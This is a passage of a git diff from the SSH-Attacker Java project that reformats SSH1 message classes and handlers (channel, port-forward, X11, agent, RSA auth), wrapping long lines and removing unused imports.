public void adjustContext(ChannelCloseMessageSSH1 message) { - LOGGER.warn("Recieved channel open failure for channel{}", message.getRemoteChannel().getValue()); + LOGGER.warn( + "Recieved channel open failure for channel{}", + message.getRemoteChannel().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelDataMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelDataMessageSSHV1Handler.java index 1b846258d..40d3d9765 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelDataMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelDataMessageSSHV1Handler.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,6 +23,9 @@ public ChannelDataMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(ChannelDataMessageSSH1 message) { - LOGGER.warn("Recieved channel Data in channel {} with data ", message.getRemoteChannel().getValue(), message.getData().getValue()); + LOGGER.warn( + "Recieved channel Data in channel {} with data ", + message.getRemoteChannel().getValue(), + message.getData().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenConfirmationMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenConfirmationMessageSSHV1Handler.java index 13e1bfe09..8374a2e64 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenConfirmationMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenConfirmationMessageSSHV1Handler.java @@ -13,7 +13,8 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelOpenConfirmationMessageSSHV1Handler extends SshMessageHandler { +public class ChannelOpenConfirmationMessageSSHV1Handler + extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -23,6 +24,8 @@ public ChannelOpenConfirmationMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(ChannelOpenConfirmationMessageSSH1 message) { - LOGGER.warn("Recieved Channel Open Confirmation with remote Channel {} and local Channel", message.getRemoteChannel().getValue()); + LOGGER.warn( + "Recieved Channel Open Confirmation with remote Channel {} and local Channel", + message.getRemoteChannel().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenFailureMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenFailureMessageSSHV1Handler.java index 1c5387992..d7d02f799 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenFailureMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenFailureMessageSSHV1Handler.java @@ -13,7 +13,8 @@ import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class ChannelOpenFailureMessageSSHV1Handler extends SshMessageHandler { +public class ChannelOpenFailureMessageSSHV1Handler + extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -23,6 +24,8 @@ public ChannelOpenFailureMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(ChannelOpenFailureMessageSSH1 message) { - LOGGER.warn("Recieved channel open failure for channel{}", message.getRemoteChannel().getValue()); + LOGGER.warn( + "Recieved channel open failure for channel{}", + message.getRemoteChannel().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortForwardRequestMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortForwardRequestMessageSSHV1Handler.java index b1cb40006..56befaf2f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortForwardRequestMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortForwardRequestMessageSSHV1Handler.java @@ -10,11 +10,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class PortForwardRequestMessageSSHV1Handler extends SshMessageHandler { +public class PortForwardRequestMessageSSHV1Handler + extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -24,6 +24,10 @@ public PortForwardRequestMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(PortForwardRequestMessageSSH1 message) { - LOGGER.warn("Forwording Port {} to {}:{}", message.getServerPort().getValue(), message.getHostToConnect().getValue(),message.getPortToConnect().getValue()); + LOGGER.warn( + "Forwording Port {} to {}:{}", + message.getServerPort().getValue(), + message.getHostToConnect().getValue(), + message.getPortToConnect().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortOpenMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortOpenMessageSSHV1Handler.java index 58103d104..dfa7ed1ab 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortOpenMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortOpenMessageSSHV1Handler.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortOpenMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,6 +23,11 @@ public PortOpenMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(PortOpenMessageSSH1 message) { - LOGGER.warn("Opening Port {} to {} on Channel {} with originator_string{}", message.getPort().getValue(), message.getHostName().getValue(),message.getLocalChannel().getValue(), message.getOriginatorString()); + LOGGER.warn( + "Opening Port {} to {} on Channel {} with originator_string{}", + message.getPort().getValue(), + message.getHostName().getValue(), + message.getLocalChannel().getValue(), + message.getOriginatorString()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthChallengeMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthChallengeMessageSSHV1Handler.java index 0a6c02126..90800567b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthChallengeMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthChallengeMessageSSHV1Handler.java @@ -10,11 +10,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthChallengeMessageSSH1; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class RsaAuthChallengeMessageSSHV1Handler extends SshMessageHandler { +public class RsaAuthChallengeMessageSSHV1Handler + extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -22,7 +22,6 @@ public RsaAuthChallengeMessageSSHV1Handler(SshContext context) { super(context); } - @Override public void adjustContext(RsaAuthChallengeMessageSSH1 message) { LOGGER.info("Recived a RSA Auth Message"); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthMessageSSHV1Handler.java index 7810637d0..370b1b53a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthMessageSSHV1Handler.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -22,7 +21,6 @@ public RsaAuthMessageSSHV1Handler(SshContext context) { super(context); } - @Override public void adjustContext(RsaAuthMessageSSH1 message) { LOGGER.info("Recived a RSA Auth Message"); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11OpenMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11OpenMessageSSHV1Handler.java index 336884e3b..150886d7c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11OpenMessageSSHV1Handler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11OpenMessageSSHV1Handler.java @@ -9,7 +9,6 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -24,6 +23,9 @@ public X11OpenMessageSSHV1Handler(SshContext context) { @Override public void adjustContext(X11OpenMessageSSH1 message) { - LOGGER.warn("Recieved channel Data in channel {} with data {}", message.getLocalChannel().getValue(), message.getOriginatorString().getValue()); + LOGGER.warn( + "Recieved channel Data in channel {} with data {}", + message.getLocalChannel().getValue(), + message.getOriginatorString().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentOpenMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentOpenMessageSSH1.java index d8ded92f8..ea15131fd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentOpenMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentOpenMessageSSH1.java @@ -15,14 +15,9 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.AgentOpenMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExitStatusMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.AgentOpenMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExitStatusMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.AgentOpenMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitStatusMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.AgentOpenMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitStatusMessageSSHV1Serializier; - import java.io.InputStream; public class AgentOpenMessageSSH1 extends SshMessage { @@ -38,7 +33,8 @@ public void setLocalChannel(ModifiableInteger localChannel) { } public void setLocalChannel(int localChannel) { - this.localChannel = ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); + this.localChannel = + ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentRequestForwardingMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentRequestForwardingMessageSSH1.java index 01293f9fe..0047de67a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentRequestForwardingMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentRequestForwardingMessageSSH1.java @@ -13,17 +13,13 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.AgentRequestForwardingMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.EofMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.AgentRequestForwardingMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.EofMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.AgentRequestForwardingMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.EofMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.AgentRequestForwardingMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.EofMessageSSHV1Serializier; - import java.io.InputStream; -public class AgentRequestForwardingMessageSSH1 extends SshMessage { +public class AgentRequestForwardingMessageSSH1 + extends SshMessage { @Override public AgentRequestForwardingMessageSSHV1Handler getHandler(SshContext context) { @@ -31,17 +27,20 @@ public AgentRequestForwardingMessageSSHV1Handler getHandler(SshContext context) } @Override - public SshMessageParser getParser(SshContext context, InputStream stream) { + public SshMessageParser getParser( + SshContext context, InputStream stream) { return new AgentRequestForwardingMessageSSHV1Parser(context, stream); } @Override - public SshMessagePreparator getPreparator(SshContext context) { + public SshMessagePreparator getPreparator( + SshContext context) { return new AgentRequestForwardingMessageSSHV1Preparator(context.getChooser(), this); } @Override - public SshMessageSerializer getSerializer(SshContext context) { + public SshMessageSerializer getSerializer( + SshContext context) { return new AgentRequestForwardingMessageSSHV1Serializier(this); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseConfirmationMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseConfirmationMessageSSH1.java index 6c4d300ff..c07d75ca1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseConfirmationMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseConfirmationMessageSSH1.java @@ -15,17 +15,13 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelCloseConfirmationMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelCloseMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelCloseConfirmationMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelCloseMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelCloseConfirmationMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelCloseMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelCloseConfirmationMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelCloseMessageSSHV1Serializier; - import java.io.InputStream; -public class ChannelCloseConfirmationMessageSSH1 extends SshMessage { +public class ChannelCloseConfirmationMessageSSH1 + extends SshMessage { private ModifiableInteger remoteChannel; @@ -38,7 +34,8 @@ public void setRemoteChannel(ModifiableInteger remoteChannel) { } public void setRemoteChannel(int remoteChannel) { - this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + this.remoteChannel = + ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); } @Override @@ -53,12 +50,14 @@ public SshMessageParser getParser( } @Override - public SshMessagePreparator getPreparator(SshContext context) { + public SshMessagePreparator getPreparator( + SshContext context) { return new ChannelCloseConfirmationMessageSSHV1Preparator(context.getChooser(), this); } @Override - public SshMessageSerializer getSerializer(SshContext context) { + public SshMessageSerializer getSerializer( + SshContext context) { return new ChannelCloseConfirmationMessageSSHV1Serializier(this); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseMessageSSH1.java index e74418c52..029e033b9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseMessageSSH1.java @@ -15,14 +15,9 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelCloseMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelOpenFailureMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelCloseMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelOpenFailureMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelCloseMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelOpenFailureMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelCloseMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelOpenFailureMessageSSHV1Serializier; - import java.io.InputStream; public class ChannelCloseMessageSSH1 extends SshMessage { @@ -38,7 +33,8 @@ public void setRemoteChannel(ModifiableInteger remoteChannel) { } public void setRemoteChannel(int remoteChannel) { - this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + this.remoteChannel = + ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelDataMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelDataMessageSSH1.java index f57b8af9d..ccdd8e90b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelDataMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelDataMessageSSH1.java @@ -16,14 +16,9 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelDataMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelOpenFailureMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelDataMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelOpenFailureMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelDataMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelOpenFailureMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelDataMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelOpenFailureMessageSSHV1Serializier; - import java.io.InputStream; public class ChannelDataMessageSSH1 extends SshMessage { @@ -43,7 +38,6 @@ public void setData(String data) { this.data = ModifiableVariableFactory.safelySetValue(this.data, data); } - public ModifiableInteger getRemoteChannel() { return remoteChannel; } @@ -53,7 +47,8 @@ public void setRemoteChannel(ModifiableInteger remoteChannel) { } public void setRemoteChannel(int remoteChannel) { - this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + this.remoteChannel = + ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenConfirmationMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenConfirmationMessageSSH1.java index fcc4038f0..4da3a5b9c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenConfirmationMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenConfirmationMessageSSH1.java @@ -17,13 +17,11 @@ import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelOpenConfirmationMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelOpenConfirmationMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelOpenConfirmationMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitStatusMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelOpenConfirmationMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitStatusMessageSSHV1Serializier; - import java.io.InputStream; -public class ChannelOpenConfirmationMessageSSH1 extends SshMessage { +public class ChannelOpenConfirmationMessageSSH1 + extends SshMessage { private ModifiableInteger localChannel; private ModifiableInteger remoteChannel; @@ -37,7 +35,8 @@ public void setLocalChannel(ModifiableInteger localChannel) { } public void setLocalChannel(int localChannel) { - this.localChannel = ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); + this.localChannel = + ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); } public ModifiableInteger getRemoteChannel() { @@ -49,7 +48,8 @@ public void setRemoteChannel(ModifiableInteger remoteChannel) { } public void setRemoteChannel(int remoteChannel) { - this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + this.remoteChannel = + ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); } @Override @@ -64,12 +64,14 @@ public SshMessageParser getParser( } @Override - public SshMessagePreparator getPreparator(SshContext context) { + public SshMessagePreparator getPreparator( + SshContext context) { return new ChannelOpenConfirmationMessageSSHV1Preparator(context.getChooser(), this); } @Override - public SshMessageSerializer getSerializer(SshContext context) { + public SshMessageSerializer getSerializer( + SshContext context) { return new ChannelOpenConfirmationMessageSSHV1Serializier(this); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenFailureMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenFailureMessageSSH1.java index 298261c0a..48be9ecd2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenFailureMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenFailureMessageSSH1.java @@ -17,10 +17,7 @@ import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelOpenFailureMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelOpenFailureMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelOpenFailureMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitStatusMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelOpenFailureMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitStatusMessageSSHV1Serializier; - import java.io.InputStream; public class ChannelOpenFailureMessageSSH1 extends SshMessage { @@ -36,7 +33,8 @@ public void setRemoteChannel(ModifiableInteger remoteChannel) { } public void setRemoteChannel(int remoteChannel) { - this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + this.remoteChannel = + ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortForwardRequestMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortForwardRequestMessageSSH1.java index b490295d8..e1c3c29bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortForwardRequestMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortForwardRequestMessageSSH1.java @@ -16,14 +16,9 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.PortForwardRequestMessageSSHV1Handler; -import de.rub.nds.sshattacker.core.protocol.ssh1.handler.X11OpenMessageSSHV1Handler; import de.rub.nds.sshattacker.core.protocol.ssh1.parser.PortForwardRequestMessageSSHV1Parser; -import de.rub.nds.sshattacker.core.protocol.ssh1.parser.X11OpenMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.PortForwardRequestMessageSSHV1Preparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.X11OpenMessageSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.PortForwardRequestMessageSSHV1Serializier; -import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.X11OpenMessageSSHV1Serializier; - import java.io.InputStream; public class PortForwardRequestMessageSSH1 extends SshMessage { @@ -32,6 +27,7 @@ public class PortForwardRequestMessageSSH1 extends SshMessage { @@ -42,7 +37,8 @@ public void setOriginatorString(ModifiableString originatorString) { } public void setOriginatorString(String originatorString) { - this.originatorString = ModifiableVariableFactory.safelySetValue(this.originatorString, originatorString); + this.originatorString = + ModifiableVariableFactory.safelySetValue(this.originatorString, originatorString); } public ModifiableString getHostName() { @@ -58,7 +54,7 @@ public void setPort(ModifiableInteger port) { } public void setPort(int port) { - this.port = ModifiableVariableFactory.safelySetValue(this.port,port); + this.port = ModifiableVariableFactory.safelySetValue(this.port, port); } public void setHostName(ModifiableString hostName) { @@ -69,12 +65,10 @@ public void setHostName(String hostName) { this.hostName = ModifiableVariableFactory.safelySetValue(this.hostName, hostName); } - public void getHostName(String hostName) { this.hostName = ModifiableVariableFactory.safelySetValue(this.hostName, hostName); } - public ModifiableInteger getLocalChannel() { return localChannel; } @@ -84,7 +78,8 @@ public void setLocalChannel(ModifiableInteger localChannel) { } public void setLocalChannel(int localChannel) { - this.localChannel = ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); + this.localChannel = + ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); } @Override @@ -93,8 +88,7 @@ public PortOpenMessageSSHV1Handler getHandler(SshContext context) { } @Override - public SshMessageParser getParser( - SshContext context, InputStream stream) { + public SshMessageParser getParser(SshContext context, InputStream stream) { return new PortOpenMessageSSHV1Parser(context, stream); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthChallengeMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthChallengeMessageSSH1.java index 52d331d09..c247379c3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthChallengeMessageSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthChallengeMessageSSH1.java @@ -19,7 +19,6 @@ import de.rub.nds.sshattacker.core.protocol.ssh1.parser.RsaAuthChallengeMessageSSHV1Parser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.RsaAuthMessageChallengeSSHV1Preparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.RsaAuthChallengeMessageSSHV1Serializier; - import java.io.InputStream; public class RsaAuthChallengeMessageSSH1 extends SshMessage { @@ -36,7 +35,9 @@ public void setEncryptedChallengeBitLenght(ModifiableInteger encryptedChallengeB } public void setEncryptedChallengeBitLenght(int identityPublicModulusBitLenght) { - this.encryptedChallengeBitLenght = ModifiableVariableFactory.safelySetValue(this.encryptedChallengeBitLenght,identityPublicModulusBitLenght); + this.encryptedChallengeBitLenght = + ModifiableVariableFactory.safelySetValue( + this.encryptedChallengeBitLenght, identityPublicModulusBitLenght); } public ModifiableByteArray getEncryptedChallenge() { @@ -48,7 +49,9 @@ public void setEncryptedChallenge(ModifiableByteArray encryptedChallenge) { } public void setIdentityPublicModulus(byte[] identityPublicModulus) 